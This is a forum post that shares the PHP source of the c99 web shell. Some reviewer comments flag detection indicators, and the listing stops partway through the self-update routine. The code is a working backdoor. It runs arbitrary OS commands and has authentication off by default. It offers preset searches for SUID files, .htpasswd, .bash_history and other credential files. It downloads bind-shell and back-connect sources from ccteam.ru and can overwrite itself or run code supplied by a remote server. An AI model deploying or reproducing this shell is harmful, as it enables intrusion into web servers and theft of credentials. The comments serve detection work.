
[Shell] c99!


Desconectado Mayk0

« en: Abril 27, 2013, 10:12:41 am »
Código: PHP
  1. <?php
  2. *
  3. *  © Captain Crunch Security TeaM. Coded by tristram
  4. *
  5. ******************************************************************************************************
  6. */
  7. //Starting calls
  // Bootstrap: timing helper, platform flag, then import of all request data
  // into the global scope.
  8. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  // $win is true when PHP_OS starts with "win" (case-insensitive).
  9. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  10. define("starttime",getmicrotime());
  // When magic_quotes_gpc is on, strip the added slashes from everything
  // reachable through $GLOBALS, recursing into arrays and skipping the
  // GLOBALS self-reference.
  11. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  // $_REQUEST is rebuilt from cookie, GET and POST data in that order, so for
  // a duplicate key POST wins over GET, which wins over the cookie.
  12. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  // register_globals emulation: every request key that is not already a
  // variable becomes a global. Any variable the script reads without assigning
  // it first (e.g. $act, $set_surl, $selfwrite further down) is therefore set
  // directly by the HTTP client.
  // NOTE(review): for detection this means the control parameters can arrive
  // as cookie, query-string or POST fields interchangeably; log and WAF rules
  // should look at all three.
  13. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  14.  
  15. $shver = "1.0 pre-release build #13"; //Current version
  16. //CONFIGURATION AND SETTINGS
  17. if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
  18. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
  19. else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
  20. }
  21.  
  22. $surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
  23.  
  24. if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  25. if (empty($surl))
  26. {
  27.  $surl = "?".$includestr; //Self url
  28. }
  29. $surl = htmlspecialchars($surl);
  30.  
  31. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  32.  
  33. //Authentication
  // Credentials for the HTTP Basic check performed later in this file. That
  // check is wrapped in `if (!empty($login))`, so with the empty default below
  // it is skipped entirely and the only remaining gate is $host_allow.
  // NOTE(review): when scoping an incident, a copy found with these defaults
  // was usable by anyone who could reach its URL, not only by whoever
  // uploaded it.
  34. $login = ""; //login
  35. //DON'T FORGOT ABOUT PASSWORD!!!
  36. $pass = ""; //password
  // The later comparison is unsalted md5() of the supplied password against
  // this value; when this is empty it is filled with md5($pass).
  37. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  38.  
  39. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  40. $login_txt = "Restricted area"; //http-auth message.
  41. $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
  42.  
  43. $gzipencode = true; //Encode with gzip?
  44.  
  45. $updatenow = false; //If true, update now (this variable will be false)
  46.  
  // Remote endpoints the script contacts over plain HTTP: c99sh_getupdate()
  // builds its request from $c99sh_updateurl and c99getsource() downloads from
  // $c99sh_sourcesurl.
  // NOTE(review): outbound requests from a web server to these hosts are a
  // network indicator; both values are editable, so absence of this traffic
  // does not rule the script out.
  47. $c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
  48. $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
  49.  
  50. $filestealth = true; //if true, don't change modify- and access-time
  51.  
  52. $donated_html = "<center><b>Owned by hacker</b></center>";
  53.                 /* If you publish free shell and you wish
  54.                 add link to your site or any other information,
  55.                 put here your html. */
  56. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  57.  
  58. $curdir = "./"; //start folder
  59. //$curdir = getenv("DOCUMENT_ROOT");
  60. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  61. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  62.  
  63. $log_email = "user@host.tld"; //Default e-mail for sending logs
  64.  
  65. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  66. $sort_save = true; //If true then save sorting-position using cookies.
  67.  
  68. // Registered file-types.
  69. //  array(
  70. //   "{action1}"=>array("ext1","ext2","ext3",...),
  71. //   "{action2}"=>array("ext4","ext5","ext6",...),
  72. //   ...
  73. //  )
  74. $ftypes  = array(
  75.  "html"=>array("html","htm","shtml"),
  76.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  77.  "exe"=>array("sh","install","bat","cmd"),
  78.  "ini"=>array("ini","inf"),
  79.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  80.  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  81.  "sdb"=>array("sdb"),
  82.  "phpsess"=>array("sess"),
  83.  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  84. );
  85.  
  86. // Registered executable file-types.
  87. //  array(
  88. //   string "command{i}"=>array("ext1","ext2","ext3",...),
  89. //   ...
  90. //  )
  91. //   {command}: %f% = filename
  92. $exeftypes  = array(
  93.  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  94.  "perl %f%" => array("pl","cgi")
  95. );
  96.  
  97. /* Highlighted files.
  98.   array(
  99.    i=>array({regexp},{type},{opentag},{closetag},{break})
  100.    ...
  101.   )
  102.   string {regexp} - regular exp.
  103.   int {type}:
  104.         0 - files and folders (as default),
  105.         1 - files only, 2 - folders only
  106.   string {opentag} - open html-tag, e.g. "<b>" (default)
  107.   string {closetag} - close html-tag, e.g. "</b>" (default)
  108.   bool {break} - if true and found match then break
  109. */
  110. $regxp_highlight  = array(
  111.   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  112.   array("config.php",1) // example
  113. );
  114.  
  115. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  116.                                                                          // array (i=>{letter} ...); string {letter} - letter of a drive
  117. //$safemode_diskettes = range("a","z");
  118. $hexdump_lines = 8;     // lines in hex preview file
  119. $hexdump_rows = 24;     // 16, 24 or 32 bytes in one line
  120.  
  121. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  122.  
  // Default password and ports for the bind, back-connect and datapipe
  // features. The code that consumes them is outside this part of the listing.
  // NOTE(review): usable as default-value indicators when reviewing listening
  // sockets and egress logs on a suspected host, but they are plain variables
  // and may have been changed in a deployed copy.
  123. $bindport_pass = "c99";   // default password for binding
  124. $bindport_port = "31373"; // default port for binding
  125. $bc_port = "31373"; // default port for back-connect
  126. $datapipe_localport = "8081"; // default port for datapipe
  127.  
  128. // Command-aliases
  // Preset list of (label, OS command) pairs, selected by platform through
  // $win. The non-Windows set enumerates SUID/SGID files, world-writable
  // paths, configuration and credential files (config*, service.pwd,
  // .htpasswd, .bash_history, .fetchmailrc), file attributes and listening
  // ports; the Windows set only lists a directory and open ports.
  // How an entry is executed is not visible in this part of the listing
  // (presumably through myshellexec() - confirm against the rest of the file).
  // NOTE(review): these exact command lines appearing as children of the
  // web-server account are a strong signal in process-audit logs.
  129. if (!$win)
  130. {
  131.  $cmdaliases = array(
  132.   array("-----------------------------------------------------------", "ls -la"),
  133.   array("find all suid files", "find / -type f -perm -04000 -ls"),
  134.   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  135.   array("find all sgid files", "find / -type f -perm -02000 -ls"),
  136.   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  137.   array("find config.inc.php files", "find / -type f -name config.inc.php"),
  138.   array("find config* files", "find / -type f -name \"config*\""),
  139.   array("find config* files in current dir", "find . -type f -name \"config*\""),
  140.   array("find all writable folders and files", "find / -perm -2 -ls"),
  141.   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  142.   array("find all service.pwd files", "find / -type f -name service.pwd"),
  143.   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  144.   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  145.   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  146.   array("find all .bash_history files", "find / -type f -name .bash_history"),
  147.   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  148.   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  149.   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  150.   array("list file attributes on a Linux second extended file system", "lsattr -va"),
  151.   array("show opened ports", "netstat -an | grep -i listen")
  152.  );
  153. }
  154. else
  155. {
  156.  $cmdaliases = array(
  157.   array("-----------------------------------------------------------", "dir"),
  158.   array("show opened ports", "netstat -an")
  159.  );
  160. }
  161.  
  162. $sess_cookie = "c99shvars"; // Cookie-variable name
  163.  
  164. $usefsbuff = true; //Buffer-function
  165. $copy_unset = false; //Remove copied files from buffer after pasting
  166.  
  167. //Quick launch
  168. $quicklaunch = array(
  169.  array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  170.  array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  171.  array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  172.  array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  173.  array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  174.  array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  175.  array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  176.  array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  177.  array("<b>Tools</b>",$surl."act=tools&d=%d"),
  178.  array("<b>Proc.</b>",$surl."act=processes&d=%d"),
  179.  array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
  180.  array("<b>Sec.</b>",$surl."act=security&d=%d"),
  181.  array("<b>SQL</b>",$surl."act=sql&d=%d"),
  182.  array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
  183.  array("<b>Update</b>",$surl."act=update&d=%d"),
  184.  array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
  185.  array("<b>Self remove</b>",$surl."act=selfremove"),
  186.  array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
  187. );
  188.  
  189. //Highlight-code colors
  190. $highlight_background = "#c0c0c0";
  191. $highlight_bg = "#FFFFFF";
  192. $highlight_comment = "#6A6A6A";
  193. $highlight_default = "#0000BB";
  194. $highlight_html = "#1300FF";
  195. $highlight_keyword = "#007700";
  196. $highlight_string = "#000000";
  197.  
  // Reads the "f" request field; @ hides the notice when it is absent.
  198. @$f = $_REQUEST["f"];
  // extract() turns every key of the client-supplied "c99shcook" array into a
  // variable in the current (global) scope and, with its default flag
  // EXTR_OVERWRITE, replaces variables that already exist. Values assigned in
  // the configuration section above are therefore not protected from request
  // data.
  // NOTE(review): do not treat the configured login/host restrictions of a
  // recovered copy as evidence of who could use it; a "c99shcook" array in
  // cookie, GET or POST data is also a request indicator.
  199. @extract($_REQUEST["c99shcook"]);
  200.  
  201. //END CONFIGURATION
  202.  
  203.  
  204. //                              \/      Next code isn't for editing     \/
  // Access gate, part 1: client address filter.
  // Each $host_allow mask is regex-escaped with preg_quote() and its escaped
  // "*" is turned back into ".*"; the masks are joined into one anchored,
  // case-insensitive pattern. With the default array("*") the pattern is
  // "^(.*)$" and every client passes.
  205. $tmp = array();
  206. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  207. $s = "!^(".implode("|",$tmp).")$!i";
  // The request is rejected only when neither REMOTE_ADDR nor its reverse-DNS
  // name matches. NOTE(review): the denial body ("c99shell</a>: Access Denied
  // - your host (...) not allow") is a distinctive response-content indicator.
  208. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  // Access gate, part 2: HTTP Basic authentication, performed only when $login
  // is non-empty.
  209. if (!empty($login))
  210. {
  211.  if (empty($md5_pass)) {$md5_pass = md5($pass);}
  // Both comparisons use loose "!=" and the password is checked as an unsalted
  // md5 digest.
  212.  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  213.  {
  214.   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  // NOTE(review): a 401 whose WWW-Authenticate realm starts with "c99shell "
  // followed by the version string is a network-level indicator of this
  // script.
  215.   header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  216.   header("HTTP/1.0 401 Unauthorized");
  217.   exit($accessdeniedmess);
  218.  }
  219. }
  220. if ($act != "img")
  221. {
  // Remember the original working directory, then switch to the configured
  // start folder.
  222. $lastdir = realpath(".");
  223. chdir($curdir);
  // Either flag discards buffered output, runs the self-update routine and
  // ends the request. $selfwrite is not assigned anywhere in the part of the
  // file shown here, so it presumably arrives through the request-variable
  // import at the top of the script.
  224. if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
  // Clipboard state (the "copy" and "cut" path lists) is stored in a client
  // cookie and restored with unserialize().
  // NOTE(review): unserialize() on cookie data is deserialization of
  // client-controlled input. A cookie named by $sess_cookie ("c99shvars" by
  // default) carrying a PHP-serialized array is a recognisable request
  // indicator.
  225. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  // Anything that does not decode to the expected array shape is replaced
  // with empty lists.
  226. if (!is_array($sess_data)) {$sess_data = array();}
  227. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  228. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  229.  
  230. $disablefunc = @ini_get("disable_functions");
  231. if (!empty($disablefunc))
  232. {
  233.  $disablefunc = str_replace(" ","",$disablefunc);
  234.  $disablefunc = explode(",",$disablefunc);
  235. }
  236.  
  237. if (!function_exists("c99_buff_prepare"))
  238. {
  239. function c99_buff_prepare()
  240. {
  241.  global $sess_data;
  242.  global $act;
  243.  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  244.  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  245.  $sess_data["copy"] = array_unique($sess_data["copy"]);
  246.  $sess_data["cut"] = array_unique($sess_data["cut"]);
  247.  sort($sess_data["copy"]);
  248.  sort($sess_data["cut"]);
  249.  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  250.  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  251. }
  252. }
  253. c99_buff_prepare();
  254. if (!function_exists("c99_sess_put"))
  255. {
  256. function c99_sess_put($data)
  257. {
  258.  global $sess_cookie;
  259.  global $sess_data;
  260.  c99_buff_prepare();
  261.  $sess_data = $data;
  262.  $data = serialize($data);
  263.  setcookie($sess_cookie,$data);
  264. }
  265. }
  266. foreach (array("sort","sql_sort") as $v)
  267. {
  268.  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  269.  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  270. }
  271. if ($sort_save)
  272. {
  273.  if (!empty($sort)) {setcookie("sort",$sort);}
  274.  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  275. }
  276. if (!function_exists("str2mini"))
  277. {
  278. function str2mini($content,$len)
  279. {
  280.  if (strlen($content) > $len)
  281.  {
  282.   $len = ceil($len/2) - 2;
  283.   return substr($content, 0,$len)."...".substr($content,-$len);
  284.  }
  285.  else {return $content;}
  286. }
  287. }
  288. if (!function_exists("view_size"))
  289. {
  290. function view_size($size)
  291. {
  292.  if (!is_numeric($size)) {return false;}
  293.  else
  294.  {
  295.   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  296.   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  297.   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  298.   else {$size = $size . " B";}
  299.   return $size;
  300.  }
  301. }
  302. }
  303. if (!function_exists("fs_copy_dir"))
  304. {
  305. function fs_copy_dir($d,$t)
  306. {
  307.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  308.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  309.  $h = opendir($d);
  310.  while (($o = readdir($h)) !== false)
  311.  {
  312.   if (($o != ".") and ($o != ".."))
  313.   {
  314.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  315.    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  316.    if (!$ret) {return $ret;}
  317.   }
  318.  }
  319.  closedir($h);
  320.  return true;
  321. }
  322. }
  323. if (!function_exists("fs_copy_obj"))
  324. {
  325. function fs_copy_obj($d,$t)
  326. {
  327.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  328.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  329.  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  330.  if (is_dir($d))
  331.  {
  332.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  333.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  334.   return fs_copy_dir($d,$t);
  335.  }
  336.  elseif (is_file($d)) {return copy($d,$t);}
  337.  else {return false;}
  338. }
  339. }
  340. if (!function_exists("fs_move_dir"))
  341. {
  342. function fs_move_dir($d,$t)
  343. {
  344.  $h = opendir($d);
  345.  if (!is_dir($t)) {mkdir($t);}
  346.  while (($o = readdir($h)) !== false)
  347.  {
  348.   if (($o != ".") and ($o != ".."))
  349.   {
  350.    $ret = true;
  351.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  352.    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
  353.    if (!$ret) {return $ret;}
  354.   }
  355.  }
  356.  closedir($h);
  357.  return true;
  358. }
  359. }
  360. if (!function_exists("fs_move_obj"))
  361. {
  362. function fs_move_obj($d,$t)
  363. {
  364.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  365.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  366.  if (is_dir($d))
  367.  {
  368.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  369.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  370.   return fs_move_dir($d,$t);
  371.  }
  372.  elseif (is_file($d))
  373.  {
  374.   if(copy($d,$t)) {return unlink($d);}
  375.   else {unlink($t); return false;}
  376.  }
  377.  else {return false;}
  378. }
  379. }
  380. if (!function_exists("fs_rmdir"))
  381. {
  382. function fs_rmdir($d)
  383. {
  384.  $h = opendir($d);
  385.  while (($o = readdir($h)) !== false)
  386.  {
  387.   if (($o != ".") and ($o != ".."))
  388.   {
  389.    if (!is_dir($d.$o)) {unlink($d.$o);}
  390.    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  391.   }
  392.  }
  393.  closedir($h);
  394.  rmdir($d);
  395.  return !is_dir($d);
  396. }
  397. }
  398. if (!function_exists("fs_rmobj"))
  399. {
  400. function fs_rmobj($o)
  401. {
  402.  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  403.  if (is_dir($o))
  404.  {
  405.   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  406.   return fs_rmdir($o);
  407.  }
  408.  elseif (is_file($o)) {return unlink($o);}
  409.  else {return false;}
  410. }
  411. }
  // myshellexec($cmd): run an OS command string and return its output as a
  // string ("" when $cmd is empty). The function tries, in order, exec(), the
  // backtick operator, system(), passthru() and popen(), using the first
  // branch whose condition holds.
  // NOTE(review): hardening through disable_functions has to cover every
  // primitive in this chain (the backtick operator is shell_exec); listing
  // only some of them leaves a working path. The backtick and popen branches
  // are not guarded by a $disablefunc lookup here.
  412. if (!function_exists("myshellexec"))
  413. {
  414. function myshellexec($cmd)
  415. {
  // $disablefunc is filled at file level from ini_get("disable_functions").
  416.  global $disablefunc;
  417.  $result = "";
  418.  if (!empty($cmd))
  419.  {
  // exec() returns the output as an array of lines; they are re-joined with "\n".
  420.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  421.   elseif (($result = `$cmd`) !== false) {}
  // system()/passthru() write straight to the output buffer, so the current
  // buffer is saved, cleared, used to capture the command output, cleared
  // again and then re-emitted.
  422.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  423.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  // Last resort: read the command's stdout through a pipe in 1024-byte chunks.
  424.   elseif (is_resource($fp = popen($cmd,"r")))
  425.   {
  426.    $result = "";
  427.    while(!feof($fp)) {$result .= fread($fp,1024);}
  428.    pclose($fp);
  429.   }
  430.  }
  431.  return $result;
  432. }
  433. }
  434. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  435. if (!function_exists("view_perms"))
  436. {
  437. function view_perms($mode)
  438. {
  439.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  440.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  441.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  442.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  443.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  444.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  445.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  446.  else {$type = "?";}
  447.  
  448.  $owner["read"] = ($mode & 00400)?"r":"-";
  449.  $owner["write"] = ($mode & 00200)?"w":"-";
  450.  $owner["execute"] = ($mode & 00100)?"x":"-";
  451.  $group["read"] = ($mode & 00040)?"r":"-";
  452.  $group["write"] = ($mode & 00020)?"w":"-";
  453.  $group["execute"] = ($mode & 00010)?"x":"-";
  454.  $world["read"] = ($mode & 00004)?"r":"-";
  455.  $world["write"] = ($mode & 00002)? "w":"-";
  456.  $world["execute"] = ($mode & 00001)?"x":"-";
  457.  
  458.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  459.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  460.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  461.  
  462.  return $type.join("",$owner).join("",$group).join("",$world);
  463. }
  464. }
  465. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}}
  466. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}}
  467. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}}
  468. if (!function_exists("parse_perms"))
  469. {
  470. function parse_perms($mode)
  471. {
  472.  if (($mode & 0xC000) === 0xC000) {$t = "s";}
  473.  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  474.  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  475.  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  476.  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  477.  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  478.  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  479.  else {$t = "?";}
  480.  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  481.  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  482.  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  483.  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  484. }
  485. }
  486. if (!function_exists("parsesort"))
  487. {
  488. function parsesort($sort)
  489. {
  490.  $one = intval($sort);
  491.  $second = substr($sort,-1);
  492.  if ($second != "d") {$second = "a";}
  493.  return array($one,$second);
  494. }
  495. }
  496. if (!function_exists("view_perms_color"))
  497. {
  498. function view_perms_color($o)
  499. {
  500.  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  501.  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  502.  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  503. }
  504. }
  // c99getsource($fn): look up $fn in a fixed table of six helper-source names
  // and download the matching .txt file from $c99sh_sourcesurl with
  // file_get_contents(). Returns the downloaded content, or false when $fn is
  // not in the table.
  // NOTE(review): the fetch is an HTTP URL passed to file_get_contents(), so
  // it depends on allow_url_fopen being enabled; the six file names below are
  // usable as proxy/egress-log indicators.
  505. if (!function_exists("c99getsource"))
  506. {
  507. function c99getsource($fn)
  508. {
  509.  global $c99sh_sourcesurl;
  510.  $array = array(
  511.   "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  512.   "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  513.   "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  514.   "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  515.   "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  516.   "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
  517.  );
  // Only names present in the table are ever appended to the base URL.
  518.  $name = $array[$fn];
  519.  if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
  520.  else {return false;}
  521. }
  522. }
  // c99sh_getupdate($update): ask the update server for a newer version and
  // act on its reply. Returns a status string, or 1 after the eval branch.
  // The reply is parsed as: byte 0 = 0x99 marker, byte 1 = message type
  // (0x01 error, 0x02 up to date, 0x03 new version, 0x04 code), byte 2 =
  // payload length, then the payload.
  // NOTE(review): types 0x03 and 0x04 both let whoever answers for the update
  // URL (fetched over plain HTTP) replace or run code on the host. A deployed
  // copy can therefore change content and hash over time, and an outbound
  // request carrying "?version=<base64>&updatenow=" is a network indicator.
  523. if (!function_exists("c99sh_getupdate"))
  524. {
  525. function c99sh_getupdate($update = true)
  526. {
  // $updatenow is not imported with `global` in this function, so it is
  // undefined here and the query string always carries updatenow=0.
  527.  $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
  528.  $data = @file_get_contents($url);
  529.  if (!$data) {return "Can't connect to update-server!";}
  530.  else
  531.  {
  532.   $data = ltrim($data);
  // Payload: ord(byte 2) bytes starting at offset 3.
  533.   $string = substr($data,3,ord($data{2}));
  // The second `return false;` on the next line is unreachable.
  534.   if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}
  535.   if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  536.   if ($data{0} == "\x99" and $data{1} == "\x03")
  537.   {
  // Payload fields are separated by 0x01: [0] = source URL, [1] = version text.
  538.    $string = explode("\x01",$string);
  539.    if ($update)
  540.    {
  // $confvars is assigned but not used in this function.
  541.     $confvars = array();
  542.     $sourceurl = $string[0];
  543.     $source = file_get_contents($sourceurl);
  544.     if (!$source) {return "Can't fetch update!";}
  545.     else
  546.     {
  // Self-overwrite: the running script file is replaced with whatever the
  // server-supplied URL returned; no integrity check is applied.
